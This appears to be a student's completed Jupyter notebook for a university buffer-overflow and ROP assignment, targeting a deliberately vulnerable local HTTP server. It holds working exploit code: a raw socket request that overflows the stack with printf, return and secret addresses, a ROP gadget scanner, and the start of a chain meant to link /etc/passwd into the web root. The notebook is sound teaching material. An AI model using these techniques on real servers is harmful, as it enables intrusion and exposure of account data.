# Exercise 2: Buffer Overflow and Return-Oriented Programming (ROP) Attacks

### Assignment Deadline: Feb 14th (Friday) before 11:59PM


**This assignment is worth 15% of the semester grade.**

**The latter part of the assignment may be challenging. If you cannot finish the whole exercise, you can still obtain partial points on the part finished.**

Before you start, run the following cell to install some dependencies. In this project, we mainly need three Python modules:

*   `python-ptrace`: tracing processes and retrieving process states
*   `lief`: ELF binary reader and transformer
*   `capstone`: amazing x86 disassembler



In [None]:
!pip install python-ptrace lief capstone

Collecting python-ptrace
  Downloading python_ptrace-0.9.9-py2.py3-none-any.whl.metadata (1.5 kB)
Collecting lief
  Downloading lief-0.16.4-cp311-cp311-manylinux_2_28_x86_64.whl.metadata (2.5 kB)
Collecting capstone
  Downloading capstone-5.0.5-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.3 kB)
Downloading python_ptrace-0.9.9-py2.py3-none-any.whl (104 kB)
Downloading lief-0.16.4-cp311-cp311-manylinux_2_28_x86_64.whl (3.0 MB)
Downloading capstone-5.0.5-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (1.5 MB)
Installing collected packages: python-ptrace, lief, capstone
Successfully installed 

## Step 1: Buffer Overflow

Now, we will download and unzip the binary sample of an HTTP server vulnerable to ROP attacks. You may also download the sample from the given Google Drive link and analyze it on your own computer if you want. Running the server will not damage your computer.


In [None]:
!wget -O server-sample.zip https://github.com/chiache/csce713-assignments/raw/master/lab2/server-sample.zip
!unzip -o server-sample.zip

--2025-03-06 05:51:22--  https://github.com/chiache/csce713-assignments/raw/master/lab2/server-sample.zip
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab2/server-sample.zip [following]
--2025-03-06 05:51:23--  https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab2/server-sample.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435193 (425K) [application/zip]
Saving to: ‘server-sample.zip’


2025-03-06 05:51:24 (2.42 MB/s) - ‘server-sample.zip’ saved [435193/435193]

Archive:  server-sample.zip
   creating: public/

Next, let's run the HTTP server as a background process.

In [None]:
!killall -9 -q server

import subprocess
import time

p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

# Wait for server to start
while True:
  if "Server started" in p.stderr.readline(): break

time.sleep(1)

Once the HTTP server is up and running, try the following cell to retrieve the index page of the website. If the server works, you should be able to see the "**Hello World**" message from the index page.

In [None]:
import requests
from IPython.display import display, HTML

r = requests.get('http://127.0.0.1:8000', stream=True)
display(HTML(r.text))

Next, modify the following cell to access different URLs inside the server and find the condition that will crash the server. **Hint: You can start with an extremely long URL to test the server.**

You can keep retrying even if you accidentally crash the server. The server uses multiple processes, so even if you crash one process with a URL, the server continues to run.

In [None]:
import requests
from IPython.display import display, HTML

# TODO: Manipulate the following command to crash the server
url = 'http://127.0.0.1:8000/'
url = url + 153 * 'a'
r = requests.get(url, stream=True)
display(HTML(r.text))

According to your experiment, what is the crashing condition of the server? Please write down your answer in the following cell.

Your answer: I used a binary search over the URL length to find how many characters are needed to crash the server through a buffer overflow from a long URL. I started with 100 'a' characters, then 1000, then 500, and eventually found that 154 characters are needed to crash the server.
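The binary search described in the answer can be sketched as follows. This is only an illustration: `crashes` is a hypothetical predicate (not part of the assignment code) that returns `True` when a URL padded with `n` characters crashes the worker, and the sketch assumes that once some length crashes the server, every longer length does too.

```python
def smallest_crashing_length(crashes, lo, hi):
    """Return the smallest n in (lo, hi] for which crashes(n) is True.

    Assumes crashes(lo) is False, crashes(hi) is True, and that the
    predicate is monotonic (longer inputs never stop crashing).
    """
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if crashes(mid):
            hi = mid      # mid crashes: the threshold is at or below mid
        else:
            lo = mid      # mid is safe: the threshold is above mid
    return hi


# Stand-in predicate for demonstration only. A real one would send the
# request and report whether the connection was dropped.
def fake_crashes(n):
    return n >= 154


print(smallest_crashing_length(fake_crashes, 100, 1000))
```

With the stand-in predicate, the search needs about ten probes instead of hundreds of linear attempts.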

Once you are done, you can terminate the server using the following cell.

In [None]:
!killall -9 -q server

## Step 2: Return-to-libc attack

In this step, you will perform a return-to-libc attack to print out extra information from the server. A return-to-libc attack is an attack based on stack smashing, which overwrites the return address on the stack to jump to a known libc function, such as `system()` or `printf()`. Normally, several challenges make this attack difficult. For example, **address space layout randomization (ASLR)** loads the libc library at a random address inside the application process, making it hard to determine what address to inject into the stack. Further, without direct access to the process state, the attacker needs to make a lot of guesses and assumptions to figure out how to attack.

To make the attack easier, we made several changes to the target program:

1.   The target program (`server`) is statically compiled with the libc code included, and the binary is loaded at a fixed place so it will not be affected by Address Space Layout Randomization (ASLR). The only part that is subject to ASLR is the stack.
2.   The target program (`server`) is compiled as a 32-bit program on a 64-bit platform, so that each address in the program is 32-bit instead of 64-bit. This greatly reduces the difficulty of injecting specific addresses into the stack. Further, the program is compiled with the `-fomit-frame-pointer` option, meaning that the frame pointer (`ebp`) is not saved in the stack frame by default.
3.   The target program (`server`) will be run under a ptrace program, which will detect when the program receives a segmentation fault and will print out the register values and the stack of the faulting process. This will allow you to peek into the program while it is under attack.




The goal of this step is to perform a return-to-libc attack to print out a specific **secret** inside the program.

### Step 2.1. Where's the return address?

Let's first take a closer look at the stack to see how the buffer overflow attack overwrites the return address. We will use the following ptrace debugger to run the server sample, so that we can capture the segmentation fault and print the registers and stack when the fault happens. Run the following cell and change the second cell to trigger the crashing condition you found in the previous step.
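The debugger cell appears to read the stack eight bytes at a time (the tracer is a 64-bit process) and print each read as two 32-bit slots, since the target is a 32-bit program. A minimal sketch of that split is given here; `split_qword` is a hypothetical helper, not part of `python-ptrace`, and the sample value is taken from the crash dump shown in this notebook.

```python
def split_qword(va, value):
    """Split one 64-bit little-endian word read at `va` into two
    (address, 32-bit value) pairs, higher address first."""
    high = (va + 4, (value >> 32) & 0xFFFFFFFF)  # upper half lives at va + 4
    low = (va, value & 0xFFFFFFFF)               # lower half lives at va
    return [high, low]


for addr, word in split_qword(0xffeabb08, 0x0804ac0061616161):
    print("%08x: %08x" % (addr, word))
```

The upper half holds the partially overwritten return address, and the lower half holds four of the injected `a` characters (`0x61`).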

In [None]:
import ptrace.debugger
from ptrace.debugger import NewProcessEvent, ProcessSignal
from resource import getpagesize
from logging import info
import signal

PGSIZE = getpagesize()

def trace_segfault(pid):
  debugger = ptrace.debugger.PtraceDebugger()
  debugger.traceFork()
  process = debugger.addProcess(pid, False)
  print("Continue process execution")
  process.cont()
  print("Wait next process event...")
  while True:
      event = debugger.waitProcessEvent()
      p = event.process
      if isinstance(event, NewProcessEvent):
        print("New process created: pid = %d" % p.pid)
        p.cont()
      elif isinstance(event, ProcessSignal):
        print("%s in process %d" % (signal.strsignal(event.signum), p.pid))
        print("EIP: %08x" % p.getreg("rip"))
        print("ESP: %08x" % p.getreg("rsp"))
        print("EBP: %08x" % p.getreg("rbp"))
        print("EAX: %08x" % p.getreg("rax"))
        print("EBX: %08x" % p.getreg("rbx"))
        print("ECX: %08x" % p.getreg("rcx"))
        print("EDX: %08x" % p.getreg("rdx"))
        print("Stack (high to low):")
        sp = p.getStackPointer()
        for va in range(sp + 24, sp - 40, -8):
            try:
                value = p.readWord(va)
                if va == sp: mark = " <- ESP"
                else: mark = ""
                print("%08x: %08x"   % (va + 4, value >> 32))
                print("%08x: %08x%s" % (va,     value & 0xFFFFFFFF, mark))
            except:
                pass
        break
  debugger.quit()

In [None]:
!killall -9 -q server

import subprocess
import multiprocessing
import time
import socket
from IPython.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# TODO: Manipulate the following command to crash the server
try:
  url = 'http://127.0.0.1:8000/'
  url += 154 * 'a'
  #url += "\x40\x2a\x05\x08"
  #url += "\x3a\xac\x04\x08"
  #url += "\x45\xf0\x0c\x08"
  #url += "\xe0\x94\x10\x08"
  r = requests.get(url, stream=True)
  display(HTML(r.text))
except:
  pass

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 2592
Segmentation fault in process 2592
EIP: 0804ab9a
ESP: ffeabb10
EBP: ffeabba8
EAX: 00000000
EBX: 61616161
ECX: 0970dd4f
EDX: 00000000
Stack (high to low):
ffeabb2c: 08107168
ffeabb28: 0970e693
ffeabb24: 00000131
ffeabb20: 0970e687
ffeabb1c: 00000000
ffeabb18: 00000000
ffeabb14: 00000004
ffeabb10: 00000001 <- ESP
ffeabb0c: 0804ac00
ffeabb08: 61616161
ffeabb04: 61616161
ffeabb00: 61616161
ffeabafc: 61616161
ffeabaf8: 61616161
ffeabaf4: 61616161
ffeabaf0: 61616161




If you set the crashing condition correctly, you should be able to overwrite just one byte of the return address, so that you can still see the rest of it. Next, we can search the code inside the binary to find out what the exact return address should be. The key in this step is that the return address must be the instruction immediately **after** a `CALL` instruction.
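The filtering rule can be sketched in plain Python. This is an illustration under assumptions: `return_address_candidates` is a hypothetical helper, the instructions are given as `(address, size, mnemonic)` tuples (with capstone these would come from `insn.address`, `insn.size`, and `insn.mnemonic`), and the default mask assumes that only the lowest byte of the return address was overwritten. The sample tuples are copied from the disassembly output in this notebook.

```python
def return_address_candidates(insns, observed, mask=0xFFFFFF00):
    """Return addresses that directly follow a CALL and agree with
    `observed` on the bytes selected by `mask`."""
    candidates = []
    for addr, size, mnemonic in insns:
        next_addr = addr + size  # a CALL pushes the address of the next instruction
        if mnemonic == "call" and (next_addr & mask) == (observed & mask):
            candidates.append(next_addr)
    return candidates


sample = [
    (0x804ac1a, 4, "push"),
    (0x804ac1e, 5, "call"),
    (0x804ac23, 3, "add"),
]
print([hex(a) for a in return_address_candidates(sample, 0x0804ac00)])
```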

We will use `lief` to read the ELF binary and `capstone` to disassemble the code to find the exact return address. You can find their documentation here:

* `lief`: https://lief-project.github.io/doc/latest/
* `capstone`: https://www.capstone-engine.org/lang_python.html

In [None]:
import lief
from capstone import *
import os

# Parse the ELF binary
binary = lief.parse("server")

code_section = binary.get_section('.text')
code_start = code_section.virtual_address
code_end = code_start + code_section.size
print("Code section: %08x - %08x" % (code_start, code_end))

# Read the code
fd = os.open('server', os.O_RDONLY)
code = os.pread(fd, code_section.size, code_section.file_offset)

# Parse the instructions within a specific range.
# The crash dump shows the overwritten return address as 0804ac00, where only
# the last byte (00) was set by our buffer overflow, so the original return
# address must lie between 0804ac00 and 0804acff.
search_range = (0x0804ac00, 0x0804acff)

md = Cs(CS_ARCH_X86, CS_MODE_32)
for insn in md.disasm(code[search_range[0]-code_start:search_range[1]-code_start], search_range[0]):
  print("0x%x:\t%s\t%s" %(insn.address, insn.mnemonic, insn.op_str))

Code section: 08049150 - 080cd6e1
0x804ac00:	loopne	0x804ab9a
0x804ac02:	adc	byte ptr [eax], cl
0x804ac04:	mov	eax, dword ptr [eax]
0x804ac06:	mov	edx, dword ptr [esp + 0x30]
0x804ac0a:	shl	edx, 2
0x804ac0d:	add	eax, edx
0x804ac0f:	mov	eax, dword ptr [eax]
0x804ac11:	mov	dword ptr [esp + 4], eax
0x804ac15:	sub	esp, 8
0x804ac18:	push	1
0x804ac1a:	push	dword ptr [esp + 0x10]
0x804ac1e:	call	0x807cfd0
0x804ac23:	add	esp, 0x10
0x804ac26:	sub	esp, 0xc
0x804ac29:	push	dword ptr [esp + 0x10]
0x804ac2d:	call	0x807cf10
0x804ac32:	add	esp, 0x10
0x804ac35:	call	0x8049fff
0x804ac3a:	mov	eax, 0x8107590
0x804ac40:	mov	eax, dword ptr [eax]
0x804ac42:	sub	esp, 0xc
0x804ac45:	push	eax
0x804ac46:	call	0x8059c10
0x804ac4b:	add	esp, 0x10
0x804ac4e:	sub	esp, 8
0x804ac51:	push	1
0x804ac53:	push	1
0x804ac55:	call	0x807f540
0x804ac5a:	add	esp, 0x10
0x804ac5d:	sub	esp, 0xc
0x804ac60:	push	1
0x804ac62:	call	0x807cf10
0x804ac67:	add	esp, 0x10
0x804ac6a:	mov	eax, dword ptr [ebx + 0x1520]
0x804ac70:	sub	esp, 0xc
0

Based on what you found, what are the possible return addresses of the attacked function? Write your answer down in the next cell. There can be multiple possible answers.

Your answer: 804ac23, 804ac32, 804ac3a, 804ac4b, 804ac5a, 804ac67, 804ac79, and 804ac98 are the possible return addresses, since each one immediately follows a function call.

### Step 2.2. Find the target symbols

Next, we need to determine the target addresses we want to inject into the program. Recall that, to call `printf()` correctly, you need a stack frame that looks like the following:

```
ESP + 24 +------------------+
         |  arguments[N-1]  |
ESP + 20 +------------------+
         |      . . .       |
ESP + 16 +------------------+
         |   arguments[1]   |
ESP + 12 +------------------+
         |   arguments[0]   |
ESP +  8 +------------------+
         |   format string  |
ESP +  4 +------------------+
         |    return addr   |
ESP +  0 +------------------+
```
The `ESP` here will be the stack pointer immediately after the function ends with the `RET` instruction and jumps to the function address you injected into the stack. You will need a format string to contain the proper parameters, such as `%s`, to print out the values that are pointed to by the arguments immediately above the format string. This means that you need at least four pieces of information:


1. The original return address to exit gracefully.
2. A pointer to a string that contains `%s`. Due to ASLR, you cannot directly use any string on the stack or on the heap, so your only hope is the data section of the binary.
3. A pointer to the variable you want to reveal from the program.
4. The address of `printf`.
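As a rough sketch of how these pieces end up on the stack: on a 32-bit little-endian target, each value is a 4-byte word with the least significant byte first. The function address overwrites the saved return address, and the words after it form the frame drawn above. `pack_frame` is a hypothetical helper and the addresses below are made-up placeholders, not values from the `server` binary.

```python
import struct


def pack_frame(func_addr, ret_addr, *args):
    """Pack a function address, the return address it will see, and its
    arguments as consecutive 32-bit little-endian words."""
    words = (func_addr, ret_addr) + args
    return b"".join(struct.pack("<I", w) for w in words)


# Placeholder values for illustration only.
frame = pack_frame(0x11223344, 0x55667788, 0x99aabbcc)
print(frame.hex())
```

Writing the words as integers and packing them in one place avoids byte-order mistakes that are easy to make when typing escape sequences by hand.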

We already figured out the first one in the last step, so let's modify the next cell to find out the other three pieces of information:

In [None]:
import lief
import os

binary = lief.parse("server")

# TODO: Find out the address of printf (Hint: Use lief API)
printf_addr = binary.get_symbol("printf").value
print("Address of printf = %08x" % (printf_addr))

# TODO: Find out the address of secret (Hint: Use lief API)
secret_addr = binary.get_symbol("secret").value
print("Address of secret = %08x" % (secret_addr))

data_section = binary.get_section('.rodata')
data_start = data_section.virtual_address
data_end = data_start + data_section.size
print("(RO) Data section: %08x - %08x" % (data_start, data_end))

fd = os.open('server', os.O_RDONLY)
data = os.pread(fd, data_section.size, data_section.file_offset)

# TODO: Search for '%s' in the data and add the pointers into a list
format_strings = []
needle = b"%s"
index = 0
while True:
    index = data.find(needle, index)
    if index == -1:
        break
    # Compute the in-memory address of the found string
    pointer_addr = data_start + index
    format_strings.append(pointer_addr)
    index += 1  # move index forward to search for further occurrences

def find_null_terminated_str(x, start):
  s = ''
  for i in range(len(x)):
    if x[start+i] == 0:
      break
    s += chr(x[start+i])
  return s.encode('unicode_escape')

print("Possible format strings:")
for str_addr in format_strings:
  print("%08x: %s" % (str_addr, find_null_terminated_str(data, str_addr - data_start)))

Address of printf = 08052a40
Address of secret = 081094e0
(RO) Data section: 080cf000 - 080eb7f4
Possible format strings:
080cf037: b'%s%s'
080cf039: b'%s'
080cf045: b'%s 200 OK\\n\\n'
080cf071: b'%s\\n\\n'
080cf096: b'%s: %s\\n'
080cf09a: b'%s\\n'
080cf0a3: b'%s 201 Created\\n\\n'
080cf113: b'%s'
080cf116: b'%s 404 Not found\\n\\n'
080cf134: b'%s 500 Internal Server Error\\n\\n'
080cf173: b'%shttp://127.0.0.1:%s%s\\n'
080cf186: b'%s%s\\n'
080cf188: b'%s\\n'
080cf214: b'%s] %s\\x1b[0m\\n'
080cf218: b'%s\\x1b[0m\\n'
080cf22d: b'%s: %s\\n'
080cf231: b'%s\\n'
080cf444: b"%s%s%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf446: b"%s%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf448: b"%s:%u: %s%sAssertion `%s' failed.\\n%n"
080cf44f: b"%s%sAssertion `%s' failed.\\n%n"
080cf451: b"%sAssertion `%s' failed.\\n%n"
080cf45e: b"%s' failed.\\n%n"
080cf4cc: b'%s/%s'
080cf4cf: b'%s'
080d0378: b"%s%s%s:%u: %s%sAssertion `%s' failed.\\n"
080d037a: b"%s%s:%u: %s%sAssertion `%s' failed.\\n"
080d037c: b"%s:%

### Step 2.3: Let's do the attack!

Now, let's run the `server` program and simultaneously send HTTP GET request(s) to test the program. Once you can successfully trigger a segmentation fault, watch the dumped stack to figure out what's being injected into the stack.

One thing you have to be aware of is that the `requests` module of Python automatically encodes the HTTP requests as Unicode. As a result, if you try to put specific bytes into the requested URL, they may be transformed into different values, so you cannot inject the exact values you want. The solution is to send raw HTTP requests to the server using a TCP socket. You still need to encode the other parts of the HTTP request, but you can insert extra bytes in the middle to inject the values you want into the server stack. The following cell uses sockets instead of the Python `requests` module to issue the HTTP requests.
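The effect of text encoding on raw bytes can be seen in a small experiment. This sketch only shows how UTF-8 changes bytes above `0x7f`; the exact transformation `requests` applies (for example, percent-encoding) may differ in detail. The four bytes are the little-endian form of the `secret` address printed earlier in this notebook.

```python
addr_bytes = bytes([0xe0, 0x94, 0x10, 0x08])  # 0x081094e0, least significant byte first
as_text = "\xe0\x94\x10\x08"                  # the same code points held in a str

utf8 = as_text.encode("utf-8")                # code points above 0x7f become two bytes each

print(len(addr_bytes), len(utf8))
print(utf8 == addr_bytes)
```

Building the request as `bytes` from the start, as the socket-based cell does with `bytearray`, sidesteps the problem.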



In [None]:
!killall -9 -q server

import subprocess
import multiprocessing
import time
import socket
from IPython.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# Let's use socket instead of requests
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 8000))

# TODO: Manipulate the following command to crash the server
#attack_url = 154 * 'a' + "\x08\x04\xac\x00\x08\x05\x2a\x40\x08\x10\x94\xe0"

attack_stack = [
  0x40, 0x2a, 0x05, 0x08, # Address of printf = 08052a40
  0x3a, 0xac, 0x04, 0x08, # Original return address: 804ac3a. However, 804ac32 also worked for me.
  0x45, 0xf0, 0x0c, 0x08, # 080cf045: b'%s 200 OK\\n\\n'
  0xe0, 0x94, 0x10, 0x08, # Address of secret = 081094e0
]

req = ("GET /" + 'a'*154).encode() + bytearray(attack_stack) + " HTTP/1.1\r\nConnection: close\r\n\r\n".encode()
#print(req)
client_socket.sendall(req)

# Wait for the response and display it
r = client_socket.recv(4096)
#print(r)
client_socket.close()
display(HTML(r.decode()))

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 3127
Segmentation fault in process 3127

## Step 3: Finding ROP Gadgets

In the next step, we will try to locate some ROP gadgets for future attacks. Recall from class that a ROP gadget is a short sequence of instructions from the original code section (the `.text` section) of the program binary, which can be reused to construct the logic that the attacker intends to perform. Each ROP gadget must end with a `RET` instruction, so that we can chain it with another ROP gadget by injecting the next address into the stack.

First, we will scan the binary to look for `RET` instructions. You can either use the capstone disassembler or directly search for the byte value that `RET` is encoded as (`0xc3`). Finish the following cell to list all the locations in the code section that can be interpreted as `RET` (even if the original instruction is not `RET`).
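The byte-search approach can be sketched without a disassembler. `find_byte_addresses` is a hypothetical helper; the sample bytes are assumed to correspond to the `pop edi; ret; xor eax, eax; pop edi; ret` sequence listed in the gadget output of this notebook. Note that a `0xc3` byte can also sit inside a longer instruction (for instance, `89 c3` encodes `mov ebx, eax`), which is exactly why such a scan finds more `RET`s than the compiler emitted.

```python
def find_byte_addresses(code, base, value=0xc3):
    """Return the virtual address of every occurrence of `value` in `code`,
    where `base` is the virtual address of code[0]."""
    needle = bytes([value])
    addrs = []
    pos = code.find(needle)
    while pos != -1:
        addrs.append(base + pos)
        pos = code.find(needle, pos + 1)  # continue after the previous hit
    return addrs


sample = bytes.fromhex("5fc331c05fc3")
print([hex(a) for a in find_byte_addresses(sample, 0x080a94ae)])
```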



In [None]:
import lief
from capstone import *
import os

binary = lief.parse("server")

code_section = binary.get_section('.text')
code_start = binary.imagebase + code_section.offset
code_end = code_start + code_section.size

fd = os.open('server', os.O_RDONLY)
code = os.pread(fd, code_section.size, code_section.file_offset)

md = Cs(CS_ARCH_X86, CS_MODE_32)
insn = next(md.disasm(code, code_start))
print("First instruction:")
print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))
print()

# TODO: find all the RET instructions and put them into a list
ret_insns = []
for i in range(len(code)):
  if code[i] == 0xc3:
    ret_insns.append(next(md.disasm(code[i:i+1], code_start+i)))

# Do not change the code below
print("Print all the RET instructions:")
for insn in ret_insns:
  assert insn.mnemonic == 'ret'
  print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

First instruction:
08049150:	sub	esp, 0xc

Print all the RET instructions:
08049647:	ret	
080498ca:	ret	
08049b63:	ret	
08049b6f:	ret	
08049ca5:	ret	
08049cca:	ret	
08049cd4:	ret	
08049ce3:	ret	
08049d16:	ret	
08049d20:	ret	
08049d63:	ret	
08049d68:	ret	
08049da9:	ret	
08049db0:	ret	
08049e13:	ret	
08049e94:	ret	
08049eb1:	ret	
08049eef:	ret	
08049f0f:	ret	
08049f2c:	ret	
08049f3e:	ret	
08049f3f:	ret	
08049ffe:	ret	
0804a010:	ret	
0804a029:	ret	
0804a129:	ret	
0804a396:	ret	
0804a39a:	ret	
0804a3aa:	ret	
0804a5a7:	ret	
0804a721:	ret	
0804a730:	ret	
0804a77c:	ret	
0804a791:	ret	
0804a7a0:	ret	
0804a914:	ret	
0804a923:	ret	
0804ac81:	ret	
0804ac9b:	ret	
0804ad49:	ret	
0804ad83:	ret	
0804ae41:	ret	
0804ae63:	ret	
0804b231:	ret	
0804b241:	ret	
0804b7c1:	ret	
0804b7cc:	ret	
0804b812:	ret	
0804b82e:	ret	
0804b84d:	ret	
0804b981:	ret	
0804ba04:	ret	
0804bb3b:	ret	
0804bbca:	ret	
0804bbde:	ret	
0804bc73:	ret	
0804bccb:	ret	
0804bcde:	ret	
0804be3b:	ret	
0804be8b:	ret	
0804beab:	ret	
0804becb:	

Once you have located all the `RET` instructions, trace back to the instructions prior to the `RET` instructions and print them out. For simplicity, you can assume the specific number of bytes that you will trace back from the `RET` instruction to find the gadget (configured with `MAX_BYTES_PER_GADGET`). For example, you can search up to 16 bytes prior to a `RET` instruction, by disassembling the 16 bytes using capstone. However, you may want to try all the possibilities from 1 to 16 bytes prior to a `RET` instruction, for two reasons:

1. The 16 bytes prior to the `RET` instruction may not be valid for the disassembler, or the disassembler may end with a few remaining bytes that cannot be disassembled.
2. Even if the 16 bytes can be properly disassembled with no remaining bytes, you would want more combinations of instructions that you can use for the attack.

Remember: Keep your code flexible regardless of what `MAX_BYTES_PER_GADGET` is. Later, you may need to return to this cell to increase the value of `MAX_BYTES_PER_GADGET` and rerun the scanning to find more gadgets.
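One way to picture the search is to enumerate every byte window that ends right before a `RET`, from 1 byte up to the configured maximum. In this sketch, `candidate_windows` is a hypothetical helper and the disassembly step is left out: each window would then be handed to the disassembler and kept only if the decoded instructions consume the whole window.

```python
def candidate_windows(code, ret_offset, max_bytes):
    """Yield (start_offset, window_bytes) for every window of
    1..max_bytes bytes that ends right before the RET at ret_offset."""
    for length in range(1, max_bytes + 1):
        start = ret_offset - length
        if start < 0:
            break  # ran past the beginning of the code buffer
        yield start, code[start:ret_offset]


sample = bytes.fromhex("31c05fc3")  # xor eax, eax ; pop edi ; ret
for start, window in candidate_windows(sample, 3, 8):
    print(start, window.hex())
```

Because the maximum is a parameter, raising `MAX_BYTES_PER_GADGET` later only changes how many windows are produced.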

In [None]:
MAX_BYTES_PER_GADGET = 8 # Not counting the RET instruction

# TODO: find all the gadgets and put them into a list.
# Each gadget shall be a list of instructions, ended with RET.
# Optionally, you can ignore repeated gadgets (i.e., sequences that have already shown up).
gadgets = []

scn_sequences = []
for insn in ret_insns:
  scn_addresses = []
  for start_addr in range(insn.address - MAX_BYTES_PER_GADGET, insn.address):
    if start_addr in scn_addresses:
      continue
    sequence = code[start_addr-code_start:insn.address-code_start]
    if sequence in scn_sequences:
      continue
    gadget = list(md.disasm(sequence, start_addr))
    if len(gadget) == 0:
      continue
    scn_addresses += [i.address for i in gadget]
    scn_sequences.append(sequence)
    if gadget[-1].address + gadget[-1].size < insn.address:
      continue
    gadgets.append(gadget+[insn])

# Do not change the code below
print("Print all the gadgets:")
n = 1
for gadget in gadgets:
  print("Gadget #%d:" % n)
  n += 1
  assert len(gadget) > 0
  assert gadget[-1].mnemonic == 'ret'
  addr = gadget[0].address
  for insn in gadget:
    assert insn.address == addr
    addr += insn.size
    print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

Streaming output truncated to the last 5000 lines.
080a94a9:	push	es
080a94aa:	lea	eax, [edi + eax + 0x30]
080a94ae:	pop	edi
080a94af:	ret	
Gadget #2207:
080a94ab:	inc	esp
080a94ac:	pop	es
080a94ad:	xor	byte ptr [edi - 0x3d], bl
080a94b0:	xor	eax, eax
080a94b2:	pop	edi
080a94b3:	ret	
Gadget #2208:
080a94ae:	pop	edi
080a94af:	ret	
080a94b0:	xor	eax, eax
080a94b2:	pop	edi
080a94b3:	ret	
Gadget #2209:
080a9520:	xor	esi, esi
080a9522:	pop	ebx
080a9523:	mov	eax, esi
080a9525:	pop	esi
080a9526:	pop	edi
080a9527:	ret	
Gadget #2210:
080a9593:	je	0x80a9570
080a9595:	pop	ebx
080a9596:	mov	eax, ebp
080a9598:	pop	esi
080a9599:	pop	edi
080a959a:	pop	ebp
080a959b:	ret	
Gadget #2211:
080a95a0:	xor	ebp, ebp
080a95a2:	pop	ebx
080a95a3:	pop	esi
080a95a4:	mov	eax, ebp
080a95a6:	pop	edi
080a95a7:	pop	ebp
080a95a8:	ret	
Gadget #2212:
080a95a1:	in	eax, dx
080a95a2:	pop	ebx
080a95a3:	pop	esi
080a95a4:	mov	eax, ebp
080a95a6:	pop	edi
080a95a7:	pop	ebp
080a95a8:	ret	
Gadget #2213:
080a9ab3:	adc	by

In [None]:
print("Total number of gadgets: %d" % len(gadgets))

Total number of gadgets: 3150


## Step 4: Return-Oriented Programming

In this step, you will use the gadgets you found to construct a return-oriented programming attack. The goal is to create a symbolic link in the `public/` directory to `/etc/passwd` so that you can later open the link to expose the local accounts. To achieve this, you need gadgets that perform 4 specific tasks:

1. Construct the string of `/etc/passwd` on the stack
2. Concatenate an existing string to `/public`
3. Set the registers EAX, EBX, and ECX for the `symlink` system call
4. Make the system call
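For orientation, the effect the ROP chain aims for is the same as a plain `symlink` call. The sketch below reproduces it with Python's `os.symlink` inside a temporary directory, so it touches neither `public/` nor `/etc/passwd`; `make_link` and the file names are hypothetical. In the usual 32-bit Linux convention, EAX carries the system call number, EBX the first argument (the link target), and ECX the second (the path of the new link).

```python
import os
import tempfile


def make_link(target, link_path):
    """Create link_path as a symbolic link pointing at target."""
    os.symlink(target, link_path)


with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "target.txt")
    with open(target, "w") as f:
        f.write("hello\n")

    link = os.path.join(tmp, "link")
    make_link(target, link)

    link_is_symlink = os.path.islink(link)
    with open(link) as f:          # reading the link follows it to the target
        link_content = f.read()

print(link_is_symlink, repr(link_content))
```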

Our first step is to find a **system call** gadget. Typically, system calls are made through `syscall`, `sysenter`, or `int $0x80`, depending on the architecture the program is running on. However, the GNU C library (glibc) nowadays has a more portable design, using a kernel-injected function called `__kernel_vsyscall`. The address of this function is pre-injected into the thread control block (TCB) of the current process and is retrieved at a specific offset from the GS register. To make such a call, the following assembly code is used:

```
call	dword ptr gs:[0x10]
```

Please change the following cell to find gadgets that can perform system calls. If you cannot find one, you may go back to the previous cell that locates all the gadgets and extend the search range.

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains a call to `__kernel_vsyscall`
  is_syscall_gadget = False
  is_syscall_gadget_2 = False
  for insn in gadget:
    if insn.mnemonic == 'call' and insn.op_str == 'dword ptr gs:[0x10]':
      is_syscall_gadget = True
    if insn.op_str == '__kernel_vsyscall':
      is_syscall_gadget_2 = True

  if is_syscall_gadget or is_syscall_gadget_2:
    print("Syscall Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

Syscall Gadget #1:
080ade79:	call	dword ptr gs:[0x10]
080ade80:	ret	
Syscall Gadget #2:
080aef20:	call	dword ptr gs:[0x10]
080aef27:	pop	ebx
080aef28:	ret	


Next, we need to find a gadget that retrieves a pointer to the string `/etc/passwd`. We can inject the string using the buffer overflow and then locate it at a certain offset from `esp`. To do so, we need a gadget that retrieves the current value of `esp` (`mov xxx, esp`, where `xxx` can be any register). Change the following cell to find gadgets that do this.

In [None]:
n = 1
for gadget in gadgets:
  # TODO: determine if this gadget contains MOV from ESP register
  is_mov_esp_gadget = False

  for insn in gadget:
    if insn.mnemonic == 'mov' and ', esp' in insn.op_str:
      is_mov_esp_gadget = True


  if is_mov_esp_gadget:
